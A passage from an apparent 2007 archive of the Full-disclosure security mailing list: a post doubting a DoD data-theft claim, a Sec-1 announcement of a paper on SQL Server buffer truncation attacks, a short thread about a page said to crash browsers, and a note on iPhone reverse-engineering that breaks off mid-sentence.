> stupid to ever realize it...
>

Also, an *informed* number of members realize the potential of gaining greater budgets by leaving machines vulnerable in an effort to lobby congress for yet more pork barrel money to "secure" these networks from "uber" hackers. So let's sift through the crapaganda while it's on the table, shall we.

/* SNIP */
"China has downloaded 10 to 20 terabytes of data from the NIPRNet (DOD's Non-Classified IP Router Network)," said Maj. Gen. William Lord, director of information, services and integration in the Air Force's Office of Warfighting Integration and Chief Information Officer, during the recent Air Force IT Conference in Montgomery, Ala. (http://www.gcn.com/print/25_25/41716-1.html)
/* END SNIP */

20 Terabytes huh. Unnoticed 20 terabytes? At that rate they would need some massive pipes to download this all undetected. Let's analyze the comment and the logic... 20 terabytes on an OC3 would take you 291 hours 44 minutes and 16 seconds, give or take. Gigabit Ethernet, 45 hours 30 minutes and change... So how did they manage to achieve this marvelous feat of magic undetected.
It obviously couldn't be at high speeds, which means they would have had to either go on undetected for quite some time, or they embedded fiber taps INSIDE of a DoD location (doubtable). 20 terabytes... I'll tell you what I think usually happens with DoD and governmental sectors... Private corporations and those in them slacking (http://cryptome.org/cg-leakage.htm). Do I blame DoD? Absolutely. I take a different view of this altogether under a "what if I was a contractor with no one monitoring me"...

Dictating to secretary: "We need another million for these uh golf... *scratch that* for these vertically integrated, high end clustered reverse path packet injection token based AES FIPS standardized firewalls. It's cutting edge technology which guarantees and mitigates against unauthorized intrusions".

The government should undertake a *real* method to secure their infrastructure. Have it revamped by industry experts and implemented by those same experts. Not some deep pocket contractors who will skim so much of the money away and into accounts in the triple borders. (reality... like it or not)

--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'

"Wise men talk because they have something to say; fools, because they have to say something." -- Plato

From garyo at sec-1.com Tue Jul 3 14:05:06 2007
From: garyo at sec-1.com (Gary Oleary-Steele)
Date: Tue, 3 Jul 2007 14:05:06 +0100
Subject: [Full-disclosure] [Sec-1 Ltd] Buffer Truncation Abuse in Microsoft SQL Server Based Applications
Message-ID:

Buffer Truncation Abuse in Microsoft SQL Server Based Applications

Release Date: 3rd July 2007
Author: Gary O'Leary-Steele
Web Site: www.sec-1.com

This paper is designed to document an attack technique Sec-1 recently adopted during the course of their application assessments. The basic principle of this technique has existed for some time; however, we hope this paper will provide an insight into how a variation of the technique can be adopted to attack common "forgotten password" functionality within web applications.

Our initial intention was to release this paper along with a case study demonstrating the flaw within a commercial application. However, since the vendor has yet to fix the flaw, it was decided that an initial censored release will be followed up with the complete release further down the line.

The paper can be downloaded here:
http://www.sec-1labs.co.uk/papers/BTA_CensoredRelease.pdf

Sec-1 specialises in the provision of network security solutions. For more information on products and services we offer visit www.sec-1.com or call 0113 257 8955.

From geoincidents at nls.net Tue Jul 3 14:50:27 2007
From: geoincidents at nls.net (Geo.)
Date: Tue, 3 Jul 2007 09:50:27 -0400
Subject: [Full-disclosure] This pages crashes browsers
In-Reply-To: <027201c7bd5b$cc411780$4101a8c0@databasesecurity.com>
Message-ID:

Found this page, click on "Accessories" then try to print the page; it seems to crash all the browsers I have as soon as I try to print. Thought someone here might like to play with the crash.
http://www.movincool.com/portable-air-conditioner/officepro60.php#

From Larry at larryseltzer.com Tue Jul 3 15:05:54 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Tue, 3 Jul 2007 10:05:54 -0400
Subject: [Full-disclosure] This pages crashes browsers
In-Reply-To:
References: <027201c7bd5b$cc411780$4101a8c0@databasesecurity.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE1A1D7A@becca.LarrySeltzer.local>

>> Found this page, click on "Accessories" then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash.

Printed from IE7 and FF 2.0.0.4, no problems.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From mwollenweber at gmail.com Tue Jul 3 15:23:55 2007
From: mwollenweber at gmail.com (matthew wollenweber)
Date: Tue, 3 Jul 2007 10:23:55 -0400
Subject: [Full-disclosure] [Dailydave] iPhone Roadblock
In-Reply-To: <4689F94F.8010800@cern.ch>
References: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com> <4689F94F.8010800@cern.ch>
Message-ID: <42210a440707030723m29238e0p27a91d311e86cac6@mail.gmail.com>

Actually the guys over at http://iphone.fiveforty.net/wiki are pretty far along on mounting the iPhone. They can read files from a sandbox set up on the phone for iTunes. I believe they're hooking the iTunes dlls being used and REing a basic interface. Also, I haven't heard of anyone doing serious work regarding loading unofficial firmware. I'm sure that's a route people may consider, but everyone seems happy with the iPhone and just want it to do m